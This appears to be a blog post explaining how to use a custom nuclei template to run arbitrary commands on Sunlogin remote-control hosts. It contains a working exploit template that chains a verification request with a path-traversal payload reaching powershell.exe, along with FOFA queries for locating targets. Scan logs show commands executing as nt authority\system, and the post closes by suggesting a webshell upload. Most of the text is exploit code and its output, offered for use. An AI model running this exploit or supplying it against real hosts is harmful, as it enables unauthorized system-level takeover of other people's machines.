How to use nuclei to rce with any command
A few weeks ago, I realized that we can use nuclei to rce with any command. You know, nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL. We can find a lot of vuls through nuclei.
There are some flags to achieve specific function in nuclei, Such as: -dresp, -V.
some Flags
-dresp flag can show all received responses for all templates.
-V flag can customize vars in key=value format.
nuclei template
there is a flag(variables) which can be used to customize vars in nuclei template. For example:
id: sunlogin_rce
info:
name: 向日葵RCE
author: Xc1Ym
severity: critical
description: 通过该链接可以执行命令
metadata:
max-request: 2
verified: true
fofa-query1: body="Verification failure"
fofa-query2: app="向日葵-远程控制"
tags: rce
variables:
cmd: "ipconfig"
http:
- raw:
- |
GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
Host: {{Hostname}}
- |
GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+{{cmd}} HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: json
part: body
internal: true
name: cid
json:
- '.verify_string'
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "contains(body_1, 'verify_string')"
- "status_code_2==200"
- "contains(body_2, 'Windows IP')"
condition: and
# digest: 490a0046304402200b08d3b3306a25fe78dc7485bc5f3f766a1189738e6d89ae775afa9ed4d3f1d1022002274e233fe7383a0c9e87f6c09ddbdad543c653e6d0592d813e76c7235eae57:ac885261be3fdd93c33050b022a2b6f1We have set the default value for cmd parameter to ipconfig. If we wish to change it to whoami, we can use -V flag. And we can also use -dresp flag to show all received responses for all templates, if we know that the IP are vulnerable.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[sunlogin_rce] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfigUse dresp to show the received responses.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras
HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html
{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
HTTP/1.1 200 OK
Content-Length: 750
Cache-Control: no-cache
Content-Type: text/json
Windows IP ����
��̫�������� ��̫��:
�����ض��� DNS �� . . . . . . . :
�������� IPv6 ��ַ. . . . . . . . : xxx
IPv4 ��ַ . . . . . . . . . . . . : xxx
�������� . . . . . . . . . . . . : xxx
Ĭ������. . . . . . . . . . . . . : xxx
���������� isatap.{xxx}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
���������� Teredo Tunneling Pseudo-Interface:
�����ض��� DNS �� . . . . . . . :
IPv6 ��ַ . . . . . . . . . . . . : xxx
�������� IPv6 ��ַ. . . . . . . . : xxx
Ĭ������. . . . . . . . . . . . . : ::
[sunlogin_rce:dsl-1] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfigUse -V to customize vars. We can watch the nuclei executed whoami and show the result.
PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp -V cmd=whoami
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.4
projectdiscovery.io
[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras
HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html
{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami
HTTP/1.1 200 OK
Content-Length: 21
Cache-Control: no-cache
Content-Type: text/json
nt authority\systemIn the end
If you want to rce witch any command, you can use variables in your template.
And you can also use nuclei to upload webshell and execute commands by webshell.
《How to use nuclei to rce with any command》链接:https://xdym11235.com/archives/297.html
具体版权规定详见侧栏版权说明页面
